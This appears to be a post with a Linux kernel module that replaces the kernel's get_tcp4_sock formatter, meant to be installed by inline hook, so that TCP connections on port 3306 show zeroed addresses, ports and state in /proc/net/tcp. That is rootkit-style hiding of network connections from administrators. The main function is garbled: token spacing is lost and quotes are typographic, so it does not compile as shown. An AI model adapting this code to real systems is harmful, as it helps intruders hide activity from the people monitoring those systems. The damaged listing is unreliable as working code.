直接 inline hook 住 get_tcp4_sock 这个函数就行了，只不过需要重新实现一下 get_tcp4_sock 的功能，再做一下过滤。需要注意，这样只改变了 /proc/net/tcp 的文本输出，连接本身仍然存在于内核的套接字表中，与其他查看途径的结果对比即可发现不一致。比较简单，代码如下：
#include<linux/kernel.h>
#include<linux/init.h>
#include<linux/module.h>
#include<linux/version.h>
#include<linux/types.h>
#include<linux/string.h>
#include<linux/unistd.h>
#include<linux/fs.h>
#include<linux/kmod.h>
#include<linux/file.h>
#include<linux/sched.h>
#include<linux/mm.h>
#include<linux/slab.h>
#include<linux/spinlock.h>
#include<linux/socket.h>
#include<linux/net.h>
#include<linux/in.h>
#include<linux/skbuff.h>
#include<linux/ip.h>
#include<linux/tcp.h>
#include<net/sock.h>
#include<asm/uaccess.h>
#include<asm/unistd.h>
#include<asm/termbits.h>
#include<asm/ioctls.h>
#include<linux/icmp.h>
#include<linux/netdevice.h>
#include<linux/netfilter.h>
#include<linux/netfilter_ipv4.h>
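/*
 * Module metadata. The published listing carried typographic quotes around
 * these string literals, which a C compiler rejects; plain ASCII quotes are
 * restored here and the values are unchanged.
 */
MODULE_LICENSE("GPL");
MODULE_AUTHOR("wzt");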
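/*
 * wnps_in_aton - convert a dotted-decimal IPv4 string to a network-order word.
 * @str: NUL-terminated text such as "127.0.0.1".
 *
 * Reads up to four '.'-separated decimal fields, shifting each one into the
 * next lower byte of a host-order accumulator, then converts the result with
 * htonl(). Fields missing at the end of the string contribute zero.
 *
 * There is no validation: characters are not checked to be digits and a
 * field is not range-checked against 255, so only fixed, trusted literals
 * should be passed in.
 *
 * The published listing had lost the whitespace between tokens and had
 * typographic quotes in the character literals, so it did not compile; both
 * are restored here and the logic is unchanged.
 */
__u32 wnps_in_aton(const char *str)
{
	unsigned long l;
	unsigned int val;
	int i;

	l = 0;
	for (i = 0; i < 4; i++) {
		/* Make room for the next octet in the low byte. */
		l <<= 8;
		if (*str != '\0') {
			val = 0;
			while (*str != '\0' && *str != '.') {
				val *= 10;
				val += *str - '0';
				str++;
			}
			l |= val;
			/* Step over the '.' separator, if there is one. */
			if (*str != '\0')
				str++;
		}
	}
	return htonl(l);
}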
/*
 * new_get_tcp4_sock - replacement row formatter for one IPv4 TCP socket.
 *
 * According to the accompanying text, this is meant to run in place of the
 * kernel's get_tcp4_sock through an inline hook. The hook installation is
 * not part of this listing.
 *
 * sk:  socket being reported
 * f:   seq_file that receives the formatted row
 * i:   slot number printed in the first column
 * len: receives the character count through the trailing %n conversion
 *
 * Behaviour visible in the code:
 *   - a printk fires on every call, and again on every match, so the kernel
 *     log fills with these markers while the function is active;
 *   - when either port equals 3306, the row is still emitted, but with the
 *     slot, both addresses, both ports and the state printed as 0. The queue,
 *     timer, uid, inode, refcount and pointer columns still come from the
 *     real socket;
 *   - every other socket is printed with its real values.
 *
 * NOTE(review): the result is a row with all-zero address/port/state columns
 * next to a populated uid/inode, which stands out when the output is
 * inspected. Only this text formatter is changed here; views that do not go
 * through it (presumably the inet_diag netlink interface -- confirm for the
 * kernel in question) would still report the socket.
 *
 * NOTE(review): the listing is extraction-damaged (whitespace between tokens
 * is missing and string literals use typographic quotes) and does not
 * compile as shown. The format strings have also lost their column
 * separators, so the code is left byte-for-byte as published.
 */
voidnew_get_tcp4_sock(structsock*sk,structseq_file*f,inti,int*len)
{
inttimer_active;
unsignedlongtimer_expires;
structtcp_sock*tp=tcp_sk(sk);
conststructinet_connection_sock*icsk=inet_csk(sk);
structinet_sock*inet=inet_sk(sk);
/* Addresses stay in network byte order; ports are converted to host order. */
__be32dest=inet->daddr;
__be32src=inet->rcv_saddr;
__u16destp=ntohs(inet->dport);
__u16srcp=ntohs(inet->sport);
/* Unconditional debug marker: one kernel-log line per formatted socket. */
printk(“!!innew_get_tcp4_sock.\n”);
/*
 * Choose the timer code and expiry for the row: 1 = retransmit timer,
 * 4 = zero-window probe timer, 2 = sk_timer pending, 0 = no timer
 * (expiry set to the current jiffies so the printed delta is zero).
 */
if(icsk->icsk_pending==ICSK_TIME_RETRANS){
timer_active=1;
timer_expires=icsk->icsk_timeout;
}elseif(icsk->icsk_pending==ICSK_TIME_PROBE0){
timer_active=4;
timer_expires=icsk->icsk_timeout;
}elseif(timer_pending(&sk->sk_timer)){
timer_active=2;
timer_expires=sk->sk_timer.expires;
}else{
timer_active=0;
timer_expires=jiffies;
}
/* Disabled alternative filter keyed on the local address; it dropped the row instead of blanking it. */
/*
if(src==wnps_in_aton(“127.0.0.1”)){
printk(“got127.0.0.1”);
return;
}
*/
/*
 * Filter: the match is on the hard-coded port 3306 as either the local or
 * the remote port, so it covers both directions of a connection.
 */
if(srcp==3306||destp==3306){
/* Second kernel-log marker, emitted once per matching socket. */
printk(“got3306!\n”);
/*
 * Same format as the branch below, but the first six values (slot, local
 * address, local port, remote address, remote port, state) are literal
 * zeros. Everything from the queue sizes onward is still read from sk.
 */
seq_printf(f,”%4d:%08X:%04X%08X:%04X%02X%08X:%08X%02X:%08lX”
“%08X%5d%8d%lu%d%p%lu%lu%u%u%d%n”,
0,0,0,0,0,0,
tp->write_seq-tp->snd_una,
sk->sk_state==TCP_LISTEN?sk->sk_ack_backlog:
(tp->rcv_nxt-tp->copied_seq),
timer_active,
jiffies_to_clock_t(timer_expires-jiffies),
icsk->icsk_retransmits,
sock_i_uid(sk),
icsk->icsk_probes_out,
sock_i_ino(sk),
atomic_read(&sk->sk_refcnt),sk,
jiffies_to_clock_t(icsk->icsk_rto),
jiffies_to_clock_t(icsk->icsk_ack.ato),
(icsk->icsk_ack.quick<<1)|icsk->icsk_ack.pingpong,
tp->snd_cwnd,
tp->snd_ssthresh>=0xFFFF?-1:tp->snd_ssthresh,
len);
}
else{
/*
 * Unfiltered row with the socket's real values. The receive-queue column
 * shows the accept backlog for listening sockets and the unread byte count
 * otherwise. %p prints the kernel address of sk, and %n stores the number
 * of characters written so far into *len.
 */
seq_printf(f,”%4d:%08X:%04X%08X:%04X%02X%08X:%08X%02X:%08lX”
“%08X%5d%8d%lu%d%p%lu%lu%u%u%d%n”,
i,src,srcp,dest,destp,sk->sk_state,
tp->write_seq-tp->snd_una,
sk->sk_state==TCP_LISTEN?sk->sk_ack_backlog:
(tp->rcv_nxt-tp->copied_seq),
timer_active,
jiffies_to_clock_t(timer_expires-jiffies),
icsk->icsk_retransmits,
sock_i_uid(sk),
icsk->icsk_probes_out,
sock_i_ino(sk),
atomic_read(&sk->sk_refcnt),sk,
jiffies_to_clock_t(icsk->icsk_rto),
jiffies_to_clock_t(icsk->icsk_ack.ato),
(icsk->icsk_ack.quick<<1)|icsk->icsk_ack.pingpong,
tp->snd_cwnd,
tp->snd_ssthresh>=0xFFFF?-1:tp->snd_ssthresh,
len);
}
}